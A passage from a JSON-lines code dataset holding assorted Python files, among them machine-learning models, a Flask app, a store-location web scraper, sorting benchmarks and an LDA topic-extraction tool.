pred_var = perceptron(X, Y, eta, num_iter)\n array_eta.append(eta)\n array_iter.append(num_iter)\n array_pred_perc.append(pred_perc * 100)\n array_pred_var.append(pred_var)\n\n plt.figure()\n plt.plot(array_iter,array_pred_perc)\n plt.show()\n plt.figure()\n plt.plot(array_iter, array_pred_var)\n plt.show()\n #plot_grid(array_eta, array_iter, array_pred_perc, \"eta\", \"epochs\", \"success rate\")\n #plot_grid(array_eta, array_iter, array_pred_var, \"eta\", \"epochs\", \"variance\")\n\n\nmain()","sub_path":"encoder.py","file_name":"encoder.py","file_ext":"py","file_size_in_byte":5966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"258275919","text":"# 수의 범위가 크기 때문에 완전탐색으로 어려움\n# 이진탐색 하는 것: 한 명의 심사관에게 얼마의 시간을 주는지\n# 총 걸리는 시간의 최선과 최악을 구한 뒤 중간 값으로 완료할 수 있는지 확인\n# 한 심사관이 mid의 시간동안 몇 명의 사람을 심사할 수 있는지 확인\n# 심사한 사람이 n값보다 많으면 시간을 줄이고, n값보다 적으면 시간을 늘린다.\ndef solution(n, times):\n # 최악의 시간\n right = max(times) * n\n left = 0\n\n while left <= right:\n # 심사관에게 주는 시간\n mid = (right + left) // 2\n\n # 주어진 시간동안 몇 명을 심사했는지\n people = 0\n for i in times:\n # 주어진 시간동안 현재 심사관이 심사할 수 있는 사람 누적하기\n people += mid//i\n\n # 모든 사람을 심사 가능할 경우\n if people >= n:\n answer = mid\n right = mid - 1\n break\n \n # 모든 사람을 심사할 수 없는 ��우\n if people < n:\n left = mid + 1\n\n return answer\n\n\nprint(solution(6, [7, 10]))\n","sub_path":"프로그래머스/3단계/입국심사.py","file_name":"입국심사.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"312045098","text":"import sys\n\nwf = open('dif.dat', 'w')\norig = open('CrossSections_rebin.dat').readlines()\ntpe = open('mainz_rebin_tpe.dat').readlines()\nnew = open('CrossSections_rebin_staterror_corrsys.dat').readlines()\n\ni = 0\nfor line in open('CrossSections_rebin_staterror_old.dat'):\n l = line.split()\n origl = orig[i].split()\n tpel = tpe[i].split()\n newl = new[i].split()\n\n #if float(l[2]) != float(origl[2]):\n # print >> wf, i, ' th'\n #if float(l[3]) != float(origl[3]):\n # print >> wf, i, ' Q2'\n #if float(l[4]) != float(origl[4]):\n # print >> wf, i, ' xs'\n #if float(l[5]) != float(origl[5]):\n # print >> wf, i, ' dxs'\n\n #if float(l[2]) != float(tpel[2]):\n # print >> wf, i, ' th'\n #if float(l[3]) != float(tpel[3]):\n # print >> wf, i, ' Q2'\n\n if float(l[2]) != float(newl[2]):\n print >> wf, i, ' th'\n if float(l[3]) != float(newl[3]):\n print >> wf, i, ' Q2'\n if float(l[4]) != float(newl[4]):\n print >> wf, i, ' xs'\n if float(l[5]) != float(newl[5]):\n print >> wf, i, ' dxs'\n if float(l[8]) != float(newl[8]):\n print >> wf, i, ' xsmin'\n if float(l[9]) != float(newl[9]):\n print >> wf, i, ' xsmax'\n \n i += 1\n \n\n\n \n","sub_path":"Charge_radius/final_analyses/fitdata/rebin/check_tpe.py","file_name":"check_tpe.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"40258620","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass QNetwork(nn.Module):\n \"\"\"Actor (Policy) Model.\"\"\"\n\n def __init__(self, state_size, action_size, seed):\n \"\"\"Initialize parameters and build model.\n Params\n ======\n state_size (int): Dimension of each state\n action_size (int): Dimension of each action\n seed (int): Random seed\n \"\"\"\n print(\"HI\")\n super(QNetwork, self).__init__()\n self.seed = torch.manual_seed(seed)\n \"*** YOUR CODE HERE ***\"\n\n # self.conv1 = nn.Conv2d(4, 32, (8,8), 4)\n # self.conv2 = nn.Conv2d(32, 64, (4,4), 2)\n # self.conv3 = nn.Conv2d(64, 64, (3,3), 1)\n # self.fc1 = nn.Linear(2304, 512)\n # self.fc2 = nn.Linear(512, action_size)\n self.fc1 = nn.Linear(state_size, 64)\n self.fc2 = nn.Linear(64, 64)\n self.fc3 = nn.Linear(64, action_size)\n\n def forward(self, state):\n \"\"\"Build a network that maps state -> action values.\"\"\"\n # print(state)\n # x = F.relu(self.conv1(state))\n # x = F.relu(self.conv2(x))\n # x = F.relu(self.conv3(x))\n # x = x.view(-1, 6*6*64)\n # x = F.relu(self.fc1(x))\n # x = self.fc2(x)\n x = F.relu(self.fc1(state))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n","sub_path":"dqn/exercise/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"395754858","text":"import json\n\nimport scrapy\n\nfrom locations.items import Feature\n\nDAYS = {\n \"Monday\": \"Mo\",\n \"Tuesday\": \"Tu\",\n \"Wednesday\": \"We\",\n \"Friday\": \"Fr\",\n \"Thursday\": \"Th\",\n \"Saturday\": \"Sa\",\n \"Sunday\": \"Su\",\n}\n\n\nclass SunLoanSpider(scrapy.Spider):\n name = \"sunloan\"\n item_attributes = {\"brand\": \"Sun Loan\"}\n allowed_domains = [\"sunloan.com\"]\n start_urls = (\"https://www.sunloan.com/locations/\",)\n download_delay = 0.5\n\n def parse(self, response):\n urls = response.xpath(\n '//div[@id=\"custom-locations-2\"]//div[@class=\"location-box\"]/div/p/strong/a/@href'\n ).extract()\n\n for url in urls:\n yield scrapy.Request(response.urljoin(url), callback=self.parse_store)\n\n def parse_store(self, response):\n try:\n data = response.xpath('//script[contains(text(),\"latitude\")]/text()').extract_first()\n data = json.loads(data)\n except TypeError:\n return\n except json.JSONDecodeError:\n data = data.replace('\"hasMap\": \\r\\n', \"\")\n data = json.loads(data)\n if not data:\n return\n\n properties = {\n \"lat\": float(data[\"geo\"][\"latitude\"]),\n \"lon\": float(data[\"geo\"][\"longitude\"]),\n \"website\": response.url,\n \"ref\": response.url,\n \"addr_full\": data[\"address\"][\"streetAddress\"],\n \"city\": data[\"address\"][\"addressLocality\"],\n \"state\": data[\"address\"][\"addressRegion\"],\n \"postcode\": data[\"address\"][\"postalCode\"],\n \"country\": \"US\",\n \"name\": data[\"name\"],\n }\n\n try:\n hours = data[\"openingHours\"]\n if hours:\n properties[\"opening_hours\"] = hours\n except:\n pass\n\n yield Feature(**properties)\n\n # yield Feature(\n # lat=float(data['geo']['latitude']),\n # lon=float(data['geo']['longitude']),\n # website=response.url,\n # ref=response.url,\n # #opening_hours=data['openingHours'],\n # addr_full=data['address']['streetAddress'],\n # city=data['address']['addressLocality'],\n # state=data['address']['addressRegion'],\n # postcode=data['address']['postalCode'],\n # country='US',\n # name=data['name'],\n # )\n","sub_path":"locations/spiders/sunloan.py","file_name":"sunloan.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"606733382","text":"from urllib.parse import quote\n\nfrom pandas_profiling.report.presentation.core import HTML, Table, Sequence, Warnings\n\n\ndef get_dataset_overview(summary):\n dataset_info = Table(\n [\n \n {\n \"name\": \"Total Number of Records\",\n \"value\": summary[\"table\"][\"n\"],\n \"fmt\": \"fmt_numeric\",\n },\n {\n \"name\": \"Total Number of Columns\",\n \"value\": summary[\"table\"][\"n_var\"],\n \"fmt\": \"fmt_numeric\",\n },\n {\n \"name\": \"Missing row cells\",\n \"value\": summary[\"table\"][\"n_cells_missing\"],\n \"fmt\": \"fmt_numeric\",\n },\n {\n \"name\": \"Missing row cells (%)\",\n \"value\": summary[\"table\"][\"p_cells_missing\"],\n \"fmt\": \"fmt_percent\",\n },\n {\n \"name\": \"Duplicate rows\",\n \"value\": summary[\"table\"][\"n_duplicates\"],\n \"fmt\": \"fmt_numeric\",\n },\n {\n \"name\": \"Duplicate rows (%)\",\n \"value\": summary[\"table\"][\"p_duplicates\"],\n \"fmt\": \"fmt_percent\",\n },\n \n ],\n name=\"Table statistics\",\n )\n\n dataset_types = Table(\n [\n {\"name\": type_name, \"value\": count, \"fmt\": \"fmt_numeric\"}\n for type_name, count in summary[\"table\"][\"types\"].items()\n ],\n name=\"Variable types\",\n )\n\n return Sequence(\n [dataset_info, dataset_types],\n anchor_id=\"dataset_overview\",\n name=\"Overview\",\n sequence_type=\"grid\",\n )\n\n\ndef get_dataset_warnings(warnings, count):\n return Warnings(warnings=warnings, name=f\"Analysis Summary ({count})\", anchor_id=\"Analysis\")\n\n\n\ndef get_dataset_reproduction(summary, date_start, date_end):\n version = summary[\"package\"][\"pandas_profiling_version\"]\n config = quote(summary[\"package\"][\"pandas_profiling_config\"])\n return Table(\n [\n {\"name\": \"Analysis started\", \"value\": date_start, \"fmt\": \"fmt\"},\n {\"name\": \"Analysis finished\", \"value\": date_end, \"fmt\": \"fmt\"},\n \n ],\n name=\"Run Statistics\",\n anchor_id=\"run_statistics\",\n )\n","sub_path":"overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"248939084","text":"#!/usr/bin/python3\n\"\"\"\nA python script that uses flask\n\"\"\"\n\nfrom flask import Flask, render_template\nfrom models import storage, State\nfrom flask import escape\n\napp = Flask(__name__)\n\n\n@app.route('/states', strict_slashes=False)\n@app.route('/states/', strict_slashes=False)\ndef show_states_and_cities(id=None):\n '''\n Displays states and cities by state id\n '''\n state_dict = storage.all(State)\n found = None\n if id is not None:\n for state in state_dict.values():\n if state.id == id:\n found = state\n break\n return render_template('9-states.html', state_dict=state_dict,\n id=id, found=found)\n\n\n@app.teardown_appcontext\ndef teardown_db(self):\n '''\n Removes the current SQLAlchemy Session\n '''\n storage.close()\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0')\n","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"316581590","text":"print(\"20190314546 李吉洁\") # 具体学号姓名请用自己信息代替\n\nimport socket\nname=socket.gethostname()\nip = socket.gethostbyname(name)\n\nimport platform\nosname=platform.platform()\n\nimport datetime\nnow=datetime.datetime.now()\n\nprint(name, ip)\nprint(osname)\nprint( now )","sub_path":"homework/homework1.py","file_name":"homework1.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"595263461","text":"#!/usr/bin/python env\n\n# Calculate if a point is within a box\n# check if a point is inside a given box. \n#\n# Parameters:\n# pt: list of 2 numbers (x,y)\n# box: list of 4 numbers (x,y,w,h). x,y is the top left point. w,h is the width and height\n\ndef point_in_box(pt, box):\n px,py = pt\n bx,by,w,h = box\n if px >= bx and px < (bx + w) and py >= by and py < (by+h):\n return True\n else:\n return False\n","sub_path":"hw08/collision_funcs.py","file_name":"collision_funcs.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"75845485","text":"# The MIT License (MIT)\n# Copyright (c) 2016, 2017 by the ESA CCI Toolbox development team and contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is furnished to do\n# so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport matplotlib\nimport matplotlib.cm as cm\n\n__author__ = \"Norman Fomferra (Brockmann Consult GmbH)\"\n\nLAND_COVER_CCI_CMAP = 'land_cover_cci'\n\n\ndef register_lc_color_map():\n lc_color_mappings = [\n (0, dict(r=0, g=0, b=0)),\n (10, dict(r=255, g=255, b=100)),\n (11, dict(r=255, g=255, b=100)),\n (12, dict(r=255, g=255, b=0)),\n (20, dict(r=170, g=240, b=240)),\n (30, dict(r=220, g=240, b=100)),\n (40, dict(r=200, g=200, b=100)),\n (50, dict(r=0, g=100, b=0)),\n (60, dict(r=0, g=160, b=0)),\n (61, dict(r=0, g=160, b=0)),\n (62, dict(r=170, g=200, b=0)),\n (70, dict(r=0, g=60, b=0)),\n (71, dict(r=0, g=60, b=0)),\n (72, dict(r=0, g=80, b=0)),\n (80, dict(r=40, g=80, b=0)),\n (81, dict(r=40, g=80, b=0)),\n (82, dict(r=40, g=100, b=0)),\n (90, dict(r=120, g=130, b=0)),\n (100, dict(r=140, g=160, b=0)),\n (110, dict(r=190, g=150, b=0)),\n (120, dict(r=150, g=100, b=0)),\n (121, dict(r=120, g=75, b=0)),\n (122, dict(r=150, g=100, b=0)),\n (130, dict(r=255, g=180, b=50)),\n (140, dict(r=255, g=220, b=210)),\n (150, dict(r=255, g=235, b=175)),\n (151, dict(r=255, g=205, b=120)),\n (152, dict(r=255, g=210, b=120)),\n (153, dict(r=255, g=235, b=175)),\n (160, dict(r=0, g=120, b=190)),\n (170, dict(r=0, g=150, b=120)),\n (180, dict(r=0, g=220, b=130)),\n (190, dict(r=195, g=20, b=0)),\n (200, dict(r=255, g=245, b=215)),\n (201, dict(r=220, g=220, b=220)),\n (202, dict(r=255, g=245, b=215)),\n (210, dict(r=0, g=70, b=200)),\n (220, dict(r=255, g=255, b=255)),\n ]\n\n classes = {lc: color for lc, color in lc_color_mappings}\n\n invalid_rgba = (0, 0, 0, 0.5)\n class_0_rgba = (0, 0, 0, 0)\n\n rgba_list = []\n num_entries = 256\n last_rgba = invalid_rgba\n for i in range(num_entries):\n color = classes.get(i)\n if color:\n last_rgba = (color['r'] / 255, color['g'] / 255, color['b'] / 255, 1.0)\n rgba_list.append(last_rgba)\n rgba_list[0] = class_0_rgba\n\n cmap = matplotlib.colors.ListedColormap(rgba_list, name=LAND_COVER_CCI_CMAP, N=num_entries)\n cm.register_cmap(cmap=cmap)\n","sub_path":"cate/util/im/cmap_lc.py","file_name":"cmap_lc.py","file_ext":"py","file_size_in_byte":3437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"285001937","text":"import time\r\nimport random\r\n\r\ndef sort1(alist):\r\n for passnum in range(len(alist)-1,0,-1):\r\n for i in range(passnum):\r\n if alist[i]>alist[i+1]:\r\n temp = alist[i]\r\n alist[i] = alist[i+1]\r\n alist[i+1] = temp\r\n\r\ndef sort2(alist):\r\n if len(alist)>1:\r\n mid = len(alist)//2\r\n lefthalf = alist[:mid]\r\n righthalf = alist[mid:]\r\n\r\n sort2(lefthalf)\r\n sort2(righthalf)\r\n\r\n i=0\r\n j=0\r\n k=0\r\n while i < len(lefthalf) and j < len(righthalf):\r\n if lefthalf[i] < righthalf[j]:\r\n alist[k]=lefthalf[i]\r\n i=i+1\r\n else:\r\n alist[k]=righthalf[j]\r\n j=j+1\r\n k=k+1\r\n\r\n while i < len(lefthalf):\r\n alist[k]=lefthalf[i]\r\n i=i+1\r\n k=k+1\r\n\r\n while j < len(righthalf):\r\n alist[k]=righthalf[j]\r\n j=j+1\r\n k=k+1\r\n\r\ndef sort3(alist, size):\r\n buckets = []\r\n for j in range(size):\r\n buckets.append(0)\r\n for i in range(size):\r\n buckets[alist[i]] += 1\r\n i = 0\r\n for j in range(size):\r\n for k in range(buckets[j]):\r\n alist[i] = j\r\n i += 1\r\n \r\n\r\nsize = int(input(\"List size? (choose a number between 10 to 1000, 0 to exit) \"))\r\nwhile (size > 0):\r\n listOfNumbers = []\r\n for x in range(size):\r\n listOfNumbers.append(random.randint(0, size-1))\r\n startTime = time.time()\r\n sort1(listOfNumbers)\r\n print ('sort1 took', (time.time() - startTime)*1000, 'milliseconds.')\r\n listOfNumbers = []\r\n for x in range(size):\r\n listOfNumbers.append(random.randint(0, size-1))\r\n startTime = time.time()\r\n sort2(listOfNumbers)\r\n print ('sort2 took', (time.time() - startTime)*1000, 'milliseconds.')\r\n listOfNumbers = []\r\n for x in range(size):\r\n listOfNumbers.append(random.randint(0, size-1))\r\n startTime = time.time()\r\n sort3(listOfNumbers, size)\r\n print ('sort3 took', (time.time() - startTime)*1000, 'milliseconds.')\r\n size = int(input(\"List size? (choose a number between 10 to 1000, 0 to exit) \"))\r\n \r\n","sub_path":"csp2016/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"123863224","text":"from putils import my_print, is_resource_exists\nimport nltk\nimport pandas as pd\nimport datetime as dt\n# from topics_extractor.topics_truncate import truncate_topics_tables\nfrom itertools import chain, tee\nfrom topics_extractor.lda_mw_handler import LDAMWHandler\nimport argparse\nimport datetime\nfrom parameters_extractor.metrics.content_check import is_text\n# from peewee_classes import *\nfrom psettings import *\nfrom putils import get_articles_from_db, get_articles_from_csv\nfrom multiprocessing import Pool\n\nnltk.data.path.append(DEFAULT_PROJECT_PATH + 'nltk_data/')\n\nCONTENT_CALLBACKS = (\n\tLDAMWHandler(),\n)\n\n\ndef get_topic(text, element_type, resource_name, is_csv=False):\n\tparams = {'topic': None, 'element_type': element_type}\n\n\tif text is not None:\n\t\tif type(text) is str:\n\t\t\tif text != '':\n\t\t\t\tparams = {k: v for k, v in chain.from_iterable(\n\t\t\t\t\t[callback(text, resource_name, is_csv=is_csv) for callback in CONTENT_CALLBACKS])}\n\n\t\t\t\tparams['element_type'] = element_type\n\n\treturn params\n\n\ndef topic_ltc_by_resource(lead_title_content_resource, is_csv=False):\n\ttry:\n\t\tlead, title, content, res, aid = lead_title_content_resource\n\texcept Exception as e:\n\t\tlead, title, content, res = lead_title_content_resource\n\t\taid = None\n\n\tl_params, t_params, c_params = LEAD_ELEMENT_TYPE, TITLE_ELEMENT_TYPE, CONTENT_ELEMENT_TYPE\n\n\tlead_params_topic = get_topic(lead, l_params, res, is_csv=is_csv)\n\ttitle_params_topic = get_topic(title, t_params, res, is_csv=is_csv)\n\tcontent_params_topic = get_topic(content, c_params, res, is_csv=is_csv)\n\n\tif aid is not None:\n\t\treturn aid, lead_params_topic, title_params_topic, content_params_topic\n\n\treturn lead_params_topic, title_params_topic, content_params_topic\n\n\ndef save_parameters(params, art):\n\tparams['article'] = art\n\n\ttry:\n\t\tt_id = Topics.select(Topics.topic).where(Topics.value == params['topic']).get().topic\n\n\t\tparams['topic'] = t_id\n\n\t\tp_obj_if_exists = Parameters.select().where((\n\t\t\tParameters.article == art.article) & (Parameters.element_type == params['element_type'])).get()\n\n\t\tparams['updated_at'] = dt.datetime.today().date()\n\n\t\tfor k, v in params.items():\n\t\t\tsetattr(p_obj_if_exists, k, v)\n\n\t\tp_obj_if_exists.save()\n\n\texcept Parameters.DoesNotExist:\n\t\tparams['created_at'] = dt.datetime.today().date()\n\t\tParameters.create(**params)\n\n\n# def _process_group_parameters(callback, params, texts):\n# for params, result in zip(params, callback(texts)):\n# k, v = result\n# params[k] = v\n# yield params\n\ndef save_topics_to_csv(save_to_file_path, df):\n\ttry:\n\t\tdf.to_csv(save_to_file_path)\n\t\tmy_print(\"{} Topics saved to [ {} ]\".format(SUCCESS_FLAG, save_to_file_path))\n\texcept Exception as e:\n\t\tmy_print(\"{} Cant save topics to [ {} ]\".format(ERROR_FLAG, save_to_file_path))\n\n\ndef merge_topics_with_in_csv(input_file_path, save_to_file_path, df, on='id', how='outer'):\n\ttry:\n\t\tdf_in = pd.read_csv(input_file_path)\n\n\t\tif df_in.index.name is None or df_in.index.name != on:\n\t\t\tdf_in.set_index([on], inplace=True)\n\n\t\tdfinal = df_in.merge(df, on=on, how=how)\n\t\tno_unnamed_columns = [i for i in dfinal.columns if \"Unnamed\" not in i]\n\n\t\tdfinal = dfinal[no_unnamed_columns]\n\n\t\tdfinal.to_csv(save_to_file_path)\n\t\tmy_print(\"{} Topics saved to [ {} ]\".format(SUCCESS_FLAG, save_to_file_path))\n\texcept Exception as e:\n\t\tmy_print(\"{} {}\".format(EXCEPTION_FLAG, e))\n\t\tmy_print(\"{} Cant save topics to [ {} ]\".format(ERROR_FLAG, save_to_file_path))\n\n\n\ndef run(resource=None, period=None, last_added_only=False, data_type=None, csv_data_input_file_path=None, csv_data_output_file_path=None):\n\tgtime_start = datetime.datetime.now()\n\n\tif data_type == 'db':\n\t\tif resource is None:\n\t\t\trdata = Resources.select().iterator()\n\t\t\tresources_iterator = [elem.__data__['resource'] for elem in rdata]\n\t\telse:\n\t\t\tif is_resource_exists(resource):\n\t\t\t\tresources_iterator = [resource]\n\t\t\telse:\n\t\t\t\tmy_print(\"{}Resource [ {} ] not found. Exiting ...\".format(ERROR_FLAG, resource))\n\n\t\tps_resources = (get_articles_from_db(resource_id=r_id, period=period, last_added_only=last_added_only) for r_id in resources_iterator)\n\n\t\tfor ps, res in zip(ps_resources, resources_iterator):\n\t\t\tltime_start = datetime.datetime.now()\n\n\t\t\tps, articles_s, data = tee(ps, 3)\n\n\t\t\t# check content; process if it's not too short or empty\n\t\t\tdata = ((p.lead, p.title, p.content, res) for p in data if (is_text(p, None)[0]))\n\n\t\t\tpool = Pool()\n\n\t\t\tparams = pool.map(topic_ltc_by_resource, data)\n\n\t\t\tfor art, prms in zip(articles_s, params):\n\t\t\t\tfor par in prms:\n\t\t\t\t\tif par is not None:\n\t\t\t\t\t\tsave_parameters(par, art)\n\n\t\t\tmy_print(\"{} [ {} ] :: LDA topics calculated in {}\".format(SUCCESS_FLAG, res, datetime.datetime.now() - ltime_start))\n\n\t\t\tdel pool\n\n\t\tif len(resources_iterator) != 1:\n\t\t\tmy_print(\"{}{} :: calculated in {}\".format(SUCCESS_FLAG, \" \".join(resources_iterator), datetime.datetime.now() - gtime_start))\n\n\telif data_type == 'csv':\n\t\tif resource is None:\n\t\t\traise Exception(\"Resource cant be undefined for csv data_type.\")\n\n\t\tps_csv_resource = get_articles_from_csv(resource, csv_data_input_file_path)\n\n\t\tltime_start = datetime.datetime.now()\n\n\t\tps, articles_s, data = tee(ps_csv_resource, 3)\n\n\t\tif csv_data_output_file_path is not None:\n\t\t\toutput_file = csv_data_output_file_path\n\t\telse:\n\t\t\toutput_file = \"{}_topics.csv\".format(resource)\n\n\t\tcsv_resource_topics_df = pd.DataFrame()\n\n\t\tpool = Pool()\n\t\ta_tmps = (pool.map(_process_csv_pool, data))\n\n\t\tfor tmp in a_tmps:\n\t\t\tcsv_resource_topics_df = csv_resource_topics_df.append([tmp])\n\n\t\tdel pool\n\n\t\tcsv_resource_topics_df.set_index('id', inplace=True)\n\n\t\tmy_print(\n\t\t\t\"{} [ {} ] :: LDA topics calculated in {}\".format(SUCCESS_FLAG, resource, datetime.datetime.now() - ltime_start))\n\n\t\t# save_topics_to_csv(output_file, csv_resource_topics_df)\n\t\tmerge_topics_with_in_csv(csv_data_input_file_path, output_file, csv_resource_topics_df)\n\telse:\n\t\tpass\n\n\ndef _process_csv_pool(a_tuple):\n\ta_id = a_tuple[-1]\n\tprms = topic_ltc_by_resource(a_tuple, is_csv=True)\n\n\ttmp = {\n\t\t'id': a_id,\n\t\t'element_type_{}_topic'.format(prms[1]['element_type']): prms[1]['topic'],\n\t\t'element_type_{}_topic'.format(prms[2]['element_type']): prms[2]['topic'],\n\t\t'element_type_{}_topic'.format(prms[3]['element_type']): prms[3]['topic'],\n\t}\n\n\treturn tmp\n\n\ndef train_models_for_resources(data_type, resources, resource_lang_csv=None, csv_data_file_path=None):\n\tresources_names_list = []\n\n\tif data_type == 'db':\n\t\tif resources is None:\n\t\t\tresources_all = Resources.select(Resources.resource).iterator()\n\t\t\tresources_names_list = [i.__data__['resource'] for i in resources_all]\n\t\telse:\n\t\t\tresources_names_list = [resources]\n\n\telif data_type == 'csv':\n\t\tresources_names_list = [resources]\n\n\tif len(resources_names_list) == 0:\n\t\traise Exception(\"Resources not defined. Set -r or --resource variable.\")\n\n\tfor resource_name in resources_names_list:\n\t\tLDAMWHandler().train(data_type=data_type, resource=resource_name, res_lang=resource_lang_csv, csv_data_file_path=csv_data_file_path)\n\n\tmy_print(\"{}Train finished.\\n\".format(SUCCESS_FLAG))\n\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser()\n\n\tsubparsers = parser.add_subparsers(title='dtype')\n\n\t# add db subparser\n\tparser_db = subparsers.add_parser('db')\n\n\t# db add defaults\n\tparser_db.set_defaults(resource=None, updkw=False, period=None, which='db')\n\n\tparser_db.add_argument('--method', '-m', required=True, dest='method')\n\tparser_db.add_argument('--resource', '-r', dest='resource')\n\tparser_db.add_argument('--period', '-p', dest='period')\n\n\t# new --last-added-only\n\tparser_db.add_argument('--last-added-only', action='store_true', dest='last_added_only', default=False)\n\n\t# add csv subparser\n\tparser_csv = subparsers.add_parser('csv')\n\n\t# csv add defaults\n\tparser_csv.set_defaults(input_file=None, resource_lang_csv=None, output_file=None, which='csv')\n\n\tparser_csv.add_argument('--method', '-m', required=True, dest='method')\n\tparser_csv.add_argument('--resource', '-r', dest='resource')\n\tparser_csv.add_argument('--resource-lang-csv', '-rlc', dest='resource_lang_csv')\n\tparser_csv.add_argument('--input-file', '-in', dest='input_file', help='Input csv file with data')\n\tparser_csv.add_argument('--output-file', '-out', dest='output_file', help='Output csv file name')\n\tparser_csv.add_argument('--parallelize', '-p', nargs='?', default=True, dest='parallelize',\n\t\t\t\t\t\t\thelp='Add a parallelization opportunity')\n\n\targs = parser.parse_args()\n\n\tif args.which == 'csv':\n\t\tif args.input_file is None:\n\t\t\traise Exception(\"Input_data parameter cant be None. Set --input-file or -in \")\n\t\telse:\n\t\t\t\"\"\"\n\t\t\t\tCSV file must be in format ID == i[1][2] Lead i[1][1] Title i[1][0] Content i[1][2]\n\t\t\t\t\n\t\t\t\"\"\"\n\t\t\tdata_file_path = args.input_file\n\n\t\t\tif args.method == 'train':\n\t\t\t\ttrain_models_for_resources(data_type='csv', resources=args.resource, resource_lang_csv=args.resource_lang_csv, csv_data_file_path=data_file_path)\n\n\t\t\telif args.method == 'evaluate':\n\t\t\t\trun(resource=args.resource, data_type=args.which, csv_data_input_file_path=args.input_file, csv_data_output_file_path=args.output_file)\n\n\n\telif args.which == 'db':\n\t\tif args.method == 'train':\n\t\t\ttruncate_topics_tables(args.resource)\n\t\t\ttrain_models_for_resources(data_type='db', resources=args.resource)\n\n\t\telif args.method == 'evaluate':\n\t\t\trun(resource=args.resource, period=args.period, last_added_only=args.last_added_only, data_type=args.which)\n","sub_path":"topics_extractor/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":9348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"5078252","text":"import numpy as np\r\nfrom matplotlib.colors import ListedColormap\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib\r\nimport matplotlib.patches as patches\r\n\r\n\r\nclass HardSVM(object):\r\n '''\r\n Author: Ethan Steidl\r\n Constructor for class\r\n rate - (float) learning rate\r\n niter - (int) number of iterations\r\n weights - (Array[float]) weights for perceptron. Weights are 1 larger than Features in\r\n hypothoses class. Index 0 represents the bias.\r\n errors - (Array[int]) number of errors per itteration. On fit convergence last elemnt will\r\n be 0\r\n '''\r\n\r\n def __init__(self, rate=0.01, itterations=10):\r\n self.rate = rate\r\n self.itterations = itterations # number of itterations\r\n self.weights = np.empty\r\n self.errors = []\r\n self.features = 0\r\n\r\n '''\r\n Author: Ethan Steidl\r\n Will alter internal weights to produce a model that maps the input data X\r\n to the training data y. creating the hypotheses weights\r\n\r\n param X - (DataFrame) Input data\r\n param y - (DataFrame) Desired output\r\n\r\n return self - returns this object as a model since wieghts are stored\r\n '''\r\n\r\n def fit(self, X, y):\r\n\r\n # clear erros array from previous fit if there was one\r\n self.errors.clear()\r\n\r\n self.features = X.shape[1]\r\n self.weights = [0 for x in range(X.shape[1] + 1)] # 1 more weight for bias than features ie cols\r\n\r\n # main loop to fit the data to the labels\r\n for i in range(self.itterations):\r\n # set iteration error to zero\r\n misclass = 0\r\n\r\n # loop over all the objects in X and corresponding y element\r\n for xi, target in zip(X, y):\r\n # calculate the needed (delta_w) update from previous step\r\n # delta_w = rate * (target – prediction current object)\r\n delta_w = self.rate * (target - self.predict(xi))\r\n\r\n # calculate what the current object will add to the weight\r\n self.weights[1:] = self.weights[1:] + (delta_w * xi)\r\n\r\n # set the bias to be the current delta_w\r\n self.weights[0] = + delta_w\r\n\r\n # increase the iteration error if delta_w != 0\r\n if (delta_w != 0):\r\n misclass += 1\r\n\r\n # Number of misclassifications, creates an array\r\n # to hold the number of misclassifications\r\n # Update the misclassification array with # of errors in iteration\r\n\r\n\r\n self.errors.append(misclass)\r\n # if there was convergence, stop looping\r\n if (misclass == 0):\r\n break\r\n\r\n return self\r\n\r\n '''\r\n Author: Christer Karlsson\r\n Returns the dot product of the input data and the wights 